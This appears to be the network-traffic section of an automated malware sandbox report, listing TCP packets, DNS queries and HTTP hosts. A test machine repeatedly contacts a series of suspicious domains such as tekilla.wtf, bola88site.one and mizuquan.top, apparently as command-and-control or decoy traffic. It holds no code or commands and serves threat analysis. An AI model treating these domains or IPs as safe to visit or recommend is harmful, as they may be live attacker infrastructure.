                                              Sep 25, 2024 11:37:32.202111959 CEST5210980192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:32.206958055 CEST8052109172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:32.652033091 CEST8052109172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:32.652072906 CEST8052109172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:32.652322054 CEST5210980192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:33.714423895 CEST5210980192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:34.733455896 CEST5211080192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:34.738698006 CEST8052110172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:34.738821030 CEST5211080192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:34.750504017 CEST5211080192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:34.755361080 CEST8052110172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:34.755492926 CEST8052110172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:35.206567049 CEST8052110172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:35.207003117 CEST8052110172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:35.207082987 CEST5211080192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:36.261260033 CEST5211080192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.280400038 CEST5211180192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.285484076 CEST8052111172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:37.285615921 CEST5211180192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.293060064 CEST5211180192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.297950029 CEST8052111172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:37.743155003 CEST8052111172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:37.743778944 CEST8052111172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:37.743829966 CEST5211180192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.747030020 CEST5211180192.168.2.7172.191.244.62
                                              Sep 25, 2024 11:37:37.751888037 CEST8052111172.191.244.62192.168.2.7
                                              Sep 25, 2024 11:37:43.149413109 CEST5211280192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:43.154336929 CEST8052112172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:43.154406071 CEST5211280192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:43.167974949 CEST5211280192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:43.172934055 CEST8052112172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:44.122807026 CEST8052112172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:44.122829914 CEST8052112172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:44.122843027 CEST8052112172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:44.123012066 CEST5211280192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:44.685626984 CEST5211280192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:45.705240965 CEST5211380192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:45.710139036 CEST8052113172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:45.710221052 CEST5211380192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:45.725790977 CEST5211380192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:45.730771065 CEST8052113172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:46.660654068 CEST8052113172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:46.660744905 CEST8052113172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:46.664263010 CEST5211380192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:47.229980946 CEST5211380192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:48.249119043 CEST5211480192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:48.254101038 CEST8052114172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:48.255753994 CEST5211480192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:48.267643929 CEST5211480192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:48.272552013 CEST8052114172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:48.272679090 CEST8052114172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:49.179666042 CEST8052114172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:49.179785013 CEST8052114172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:49.179940939 CEST5211480192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:49.777096033 CEST5211480192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:50.795949936 CEST5211580192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:50.800924063 CEST8052115172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:50.804415941 CEST5211580192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:50.812529087 CEST5211580192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:50.817404032 CEST8052115172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:51.714113951 CEST8052115172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:51.714771032 CEST8052115172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:51.714838028 CEST5211580192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:51.717613935 CEST5211580192.168.2.7172.96.191.39
                                              Sep 25, 2024 11:37:51.722572088 CEST8052115172.96.191.39192.168.2.7
                                              Sep 25, 2024 11:37:56.944108963 CEST5211680192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:56.949208021 CEST8052116217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:37:56.949734926 CEST5211680192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:56.961630106 CEST5211680192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:56.966531992 CEST8052116217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:37:57.561903954 CEST8052116217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:37:57.561932087 CEST8052116217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:37:57.561999083 CEST5211680192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:58.467725992 CEST5211680192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:59.483658075 CEST5211780192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:59.489672899 CEST8052117217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:37:59.489758015 CEST5211780192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:59.505280018 CEST5211780192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:37:59.510333061 CEST8052117217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:00.093703985 CEST8052117217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:00.093807936 CEST8052117217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:00.099886894 CEST5211780192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:01.011303902 CEST5211780192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:02.033663988 CEST5211880192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:02.038621902 CEST8052118217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:02.045660973 CEST5211880192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:02.053656101 CEST5211880192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:02.058629990 CEST8052118217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:02.058645964 CEST8052118217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:02.650785923 CEST8052118217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:02.650902033 CEST8052118217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:02.652252913 CEST5211880192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:03.558187008 CEST5211880192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:04.581651926 CEST5211980192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:04.586580038 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:04.586777925 CEST5211980192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:04.594868898 CEST5211980192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:04.599847078 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:05.211067915 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:05.211108923 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:05.211127043 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:05.211275101 CEST5211980192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:05.292314053 CEST5211980192.168.2.7217.70.184.50
                                              Sep 25, 2024 11:38:05.297801971 CEST8052119217.70.184.50192.168.2.7
                                              Sep 25, 2024 11:38:10.981661081 CEST5212080192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:10.986608982 CEST805212063.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:10.986701965 CEST5212080192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:10.999030113 CEST5212080192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:11.003901005 CEST805212063.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:11.585447073 CEST805212063.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:11.586035013 CEST805212063.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:11.586095095 CEST5212080192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:12.511399984 CEST5212080192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:13.532090902 CEST5212180192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:13.537321091 CEST805212163.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:13.537406921 CEST5212180192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:13.554080963 CEST5212180192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:13.559071064 CEST805212163.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:14.144331932 CEST805212163.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:14.144393921 CEST805212163.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:14.149666071 CEST5212180192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:15.058401108 CEST5212180192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:16.085660934 CEST5212280192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:16.090642929 CEST805212263.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:16.093825102 CEST5212280192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:16.105684996 CEST5212280192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:16.110575914 CEST805212263.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:16.110712051 CEST805212263.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:16.688536882 CEST805212263.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:16.688575983 CEST805212263.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:16.688709974 CEST5212280192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:17.623505116 CEST5212280192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:18.639810085 CEST5212380192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:18.645817995 CEST805212363.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:18.645936012 CEST5212380192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:18.655910969 CEST5212380192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:18.660706997 CEST805212363.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:19.231906891 CEST805212363.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:19.231985092 CEST805212363.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:19.232099056 CEST5212380192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:19.236215115 CEST5212380192.168.2.763.250.47.40
                                              Sep 25, 2024 11:38:19.241230011 CEST805212363.250.47.40192.168.2.7
                                              Sep 25, 2024 11:38:24.276231050 CEST5212480192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:24.281135082 CEST805212491.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:24.282066107 CEST5212480192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:24.293692112 CEST5212480192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:24.298641920 CEST805212491.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:24.903033018 CEST805212491.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:24.903080940 CEST805212491.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:24.904088020 CEST5212480192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:25.809516907 CEST5212480192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:26.828399897 CEST5212580192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:26.833833933 CEST805212591.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:26.835923910 CEST5212580192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:26.847807884 CEST5212580192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:26.852689981 CEST805212591.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:27.458257914 CEST805212591.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:27.458381891 CEST805212591.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:27.458436012 CEST5212580192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:28.355159044 CEST5212580192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:29.374927044 CEST5212680192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:29.380290985 CEST805212691.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:29.380369902 CEST5212680192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:29.395831108 CEST5212680192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:29.400799036 CEST805212691.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:29.400959969 CEST805212691.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:30.000355005 CEST805212691.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:30.000510931 CEST805212691.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:30.000560999 CEST5212680192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:30.905685902 CEST5212680192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:31.921931028 CEST5212780192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:31.929222107 CEST805212791.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:31.929352999 CEST5212780192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:31.940078974 CEST5212780192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:31.944927931 CEST805212791.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:32.550679922 CEST805212791.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:32.550842047 CEST805212791.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:32.552612066 CEST5212780192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:32.554002047 CEST5212780192.168.2.791.184.0.200
                                              Sep 25, 2024 11:38:32.558835030 CEST805212791.184.0.200192.168.2.7
                                              Sep 25, 2024 11:38:37.894345045 CEST5212880192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:37.899333000 CEST805212813.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:37.899411917 CEST5212880192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:37.915832043 CEST5212880192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:37.920706987 CEST805212813.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:38.362642050 CEST805212813.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:38.365793943 CEST5212880192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:39.417829037 CEST5212880192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:39.422771931 CEST805212813.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:40.468161106 CEST5212980192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:40.473154068 CEST805212913.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:40.480734110 CEST5212980192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:40.515198946 CEST5212980192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:40.520095110 CEST805212913.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:40.948240042 CEST805212913.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:40.949790001 CEST5212980192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:42.027403116 CEST5212980192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:42.032382965 CEST805212913.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:43.047804117 CEST5213080192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:43.053903103 CEST805213013.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:43.056293011 CEST5213080192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:43.068074942 CEST5213080192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:43.073009014 CEST805213013.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:43.073112011 CEST805213013.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:43.527322054 CEST805213013.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:43.527375937 CEST5213080192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:44.574050903 CEST5213080192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:44.579863071 CEST805213013.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:45.593816996 CEST5213180192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:45.599642992 CEST805213113.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:45.599728107 CEST5213180192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:45.607721090 CEST5213180192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:45.612852097 CEST805213113.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:46.060394049 CEST805213113.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:46.060461044 CEST805213113.248.169.48192.168.2.7
                                              Sep 25, 2024 11:38:46.060671091 CEST5213180192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:46.063317060 CEST5213180192.168.2.713.248.169.48
                                              Sep 25, 2024 11:38:46.068070889 CEST805213113.248.169.48192.168.2.7
                                              Sep 25, 2024 11:39:05.229491949 CEST5213680192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:05.234374046 CEST805213643.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:05.234450102 CEST5213680192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:05.249061108 CEST5213680192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:05.253935099 CEST805213643.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:06.101471901 CEST805213643.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:06.101711035 CEST805213643.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:06.101769924 CEST5213680192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:06.761717081 CEST5213680192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:07.780617952 CEST5213780192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:07.785523891 CEST805213743.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:07.785626888 CEST5213780192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:07.796490908 CEST5213780192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:07.801341057 CEST805213743.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:08.656403065 CEST805213743.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:08.656503916 CEST805213743.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:08.656855106 CEST5213780192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:09.308600903 CEST5213780192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:10.333365917 CEST5213880192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:10.339226007 CEST805213843.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:10.339306116 CEST5213880192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:10.350511074 CEST5213880192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:10.357156992 CEST805213843.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:10.359420061 CEST805213843.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:11.201750040 CEST805213843.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:11.202011108 CEST805213843.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:11.202053070 CEST5213880192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:11.855307102 CEST5213880192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:12.876492977 CEST5213980192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:12.881510019 CEST805213943.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:12.881643057 CEST5213980192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:12.892497063 CEST5213980192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:12.897392988 CEST805213943.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:13.754086971 CEST805213943.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:13.754312038 CEST805213943.242.202.169192.168.2.7
                                              Sep 25, 2024 11:39:13.754390955 CEST5213980192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:14.697156906 CEST5213980192.168.2.743.242.202.169
                                              Sep 25, 2024 11:39:14.701987028 CEST805213943.242.202.169192.168.2.7

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 25, 2024 11:36:43.726154089 CEST5365453192.168.2.71.1.1.1
                                              Sep 25, 2024 11:36:43.736401081 CEST53536541.1.1.1192.168.2.7
                                              Sep 25, 2024 11:36:48.749051094 CEST5096753192.168.2.71.1.1.1
                                              Sep 25, 2024 11:36:49.358283997 CEST53509671.1.1.1192.168.2.7
                                              Sep 25, 2024 11:36:51.225744009 CEST5362493162.159.36.2192.168.2.7
                                              Sep 25, 2024 11:36:51.880702019 CEST53634881.1.1.1192.168.2.7
                                              Sep 25, 2024 11:36:54.374309063 CEST5969353192.168.2.71.1.1.1
                                              Sep 25, 2024 11:36:54.834338903 CEST53596931.1.1.1192.168.2.7
                                              Sep 25, 2024 11:37:15.436974049 CEST6244153192.168.2.71.1.1.1
                                              Sep 25, 2024 11:37:16.113395929 CEST53624411.1.1.1192.168.2.7
                                              Sep 25, 2024 11:37:29.248837948 CEST5890953192.168.2.71.1.1.1
                                              Sep 25, 2024 11:37:29.640199900 CEST53589091.1.1.1192.168.2.7
                                              Sep 25, 2024 11:37:42.765614986 CEST5252453192.168.2.71.1.1.1
                                              Sep 25, 2024 11:37:43.146205902 CEST53525241.1.1.1192.168.2.7
                                              Sep 25, 2024 11:37:56.733958006 CEST6468053192.168.2.71.1.1.1
                                              Sep 25, 2024 11:37:56.940445900 CEST53646801.1.1.1192.168.2.7
                                              Sep 25, 2024 11:38:10.313380957 CEST6510553192.168.2.71.1.1.1
                                              Sep 25, 2024 11:38:10.975204945 CEST53651051.1.1.1192.168.2.7
                                              Sep 25, 2024 11:38:24.253700018 CEST5041053192.168.2.71.1.1.1
                                              Sep 25, 2024 11:38:24.270351887 CEST53504101.1.1.1192.168.2.7
                                              Sep 25, 2024 11:38:37.636727095 CEST6501653192.168.2.71.1.1.1
                                              Sep 25, 2024 11:38:37.666352034 CEST53650161.1.1.1192.168.2.7
                                              Sep 25, 2024 11:38:51.077765942 CEST6134853192.168.2.71.1.1.1
                                              Sep 25, 2024 11:39:04.503387928 CEST5632253192.168.2.71.1.1.1
                                              Sep 25, 2024 11:39:05.226440907 CEST53563221.1.1.1192.168.2.7

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 25, 2024 11:36:43.726154089 CEST192.168.2.71.1.1.10xc06eStandard query (0)www.woshop.onlineA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:36:48.749051094 CEST192.168.2.71.1.1.10xe44eStandard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:36:54.374309063 CEST192.168.2.71.1.1.10xcce3Standard query (0)www.elsupertodo.netA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:37:15.436974049 CEST192.168.2.71.1.1.10xdc3bStandard query (0)www.omexai.infoA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:37:29.248837948 CEST192.168.2.71.1.1.10xe7b4Standard query (0)www.tekilla.wtfA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:37:42.765614986 CEST192.168.2.71.1.1.10xa65cStandard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:37:56.733958006 CEST192.168.2.71.1.1.10x8675Standard query (0)www.languagemodel.proA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:38:10.313380957 CEST192.168.2.71.1.1.10x1b03Standard query (0)www.kexweb.topA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:38:24.253700018 CEST192.168.2.71.1.1.10x6a61Standard query (0)www.jobworklanka.onlineA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:38:37.636727095 CEST192.168.2.71.1.1.10x6edcStandard query (0)www.dyme.techA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:38:51.077765942 CEST192.168.2.71.1.1.10xe66fStandard query (0)www.arlon-commerce.comA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:39:04.503387928 CEST192.168.2.71.1.1.10x7904Standard query (0)www.mizuquan.topA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 25, 2024 11:36:43.736401081 CEST1.1.1.1192.168.2.70xc06eName error (3)www.woshop.onlinenonenoneA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:36:49.358283997 CEST1.1.1.1192.168.2.70xe44eName error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:36:54.834338903 CEST1.1.1.1192.168.2.70xcce3No error (0)www.elsupertodo.net148.72.152.174A (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:37:16.113395929 CEST1.1.1.1192.168.2.70xdc3bNo error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 11:37:16.113395929 CEST1.1.1.1192.168.2.70xdc3bNo error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:37:16.113395929 CEST1.1.1.1192.168.2.70xdc3bNo error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:37:29.640199900 CEST1.1.1.1192.168.2.70xe7b4No error (0)www.tekilla.wtfredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 11:37:29.640199900 CEST1.1.1.1192.168.2.70xe7b4No error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:37:43.146205902 CEST1.1.1.1192.168.2.70xa65cNo error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 11:37:43.146205902 CEST1.1.1.1192.168.2.70xa65cNo error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:37:56.940445900 CEST1.1.1.1192.168.2.70x8675No error (0)www.languagemodel.prowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 11:37:56.940445900 CEST1.1.1.1192.168.2.70x8675No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:38:10.975204945 CEST1.1.1.1192.168.2.70x1b03No error (0)www.kexweb.top63.250.47.40A (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:38:24.270351887 CEST1.1.1.1192.168.2.70x6a61No error (0)www.jobworklanka.onlinejobworklanka.onlineCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 11:38:24.270351887 CEST1.1.1.1192.168.2.70x6a61No error (0)jobworklanka.online91.184.0.200A (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:38:37.666352034 CEST1.1.1.1192.168.2.70x6edcNo error (0)www.dyme.tech13.248.169.48A (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:38:37.666352034 CEST1.1.1.1192.168.2.70x6edcNo error (0)www.dyme.tech76.223.54.146A (IP address)IN (0x0001)false
                                              Sep 25, 2024 11:38:51.176611900 CEST1.1.1.1192.168.2.70xe66fNo error (0)www.arlon-commerce.comwhois-unverified.domainbox.akadns.netCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 11:39:05.226440907 CEST1.1.1.1192.168.2.70x7904No error (0)www.mizuquan.top43.242.202.169A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.elsupertodo.net
                                              • www.omexai.info
                                              • www.tekilla.wtf
                                              • www.bola88site.one
                                              • www.languagemodel.pro
                                              • www.kexweb.top
                                              • www.jobworklanka.online
                                              • www.dyme.tech
                                              • www.mizuquan.top

                                              HTTP Packets

